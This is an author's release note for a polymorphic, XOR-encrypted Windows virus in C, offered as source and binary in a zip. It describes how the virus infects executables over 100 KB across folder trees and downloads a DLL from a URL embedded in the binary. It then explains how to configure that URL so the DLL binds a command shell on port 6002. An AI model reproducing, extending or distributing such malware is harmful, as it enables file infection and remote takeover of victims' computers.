Written in C

Released in January 2004

A polymorph and encrypted VIRUS in C 

By Delikon/ [email protected] / www.delikon.de /6.1.2004

This is my first try, to code a polymorph and encrypted virus.

1) The encryption is very simple only 1 byte xor encryption

2) The polymorphism is also very simply, the decryptor is padded with 1 - 6 nops.

The virus.zip archive includes the sourcecode(vc++) and binary from the virus and the dll which binds the cmd shell on the port 6002.


***********The Algorithm of the virus**************

the virus creates a new thread which search for file in the current folder and all folders below, 
if it find .exe files which are bigger than 100k it will infect them.

if the virus has end searching it will check if there is a dll with the name b.dll in the system32 folder,
if there is one it will call the main function
if there is no dll, it will download the dll.
The advantage of this is that you can define always new features of your virus, without changing the virus code.

*********************ADD the url for the dll********************


open the virus2.exe and write the url at the end of the code like this

[virus-code][one NULL_Byte left]http://www.delikon.de/shelldll.dll

This DLL will bind a shell on port 6002.

Delikon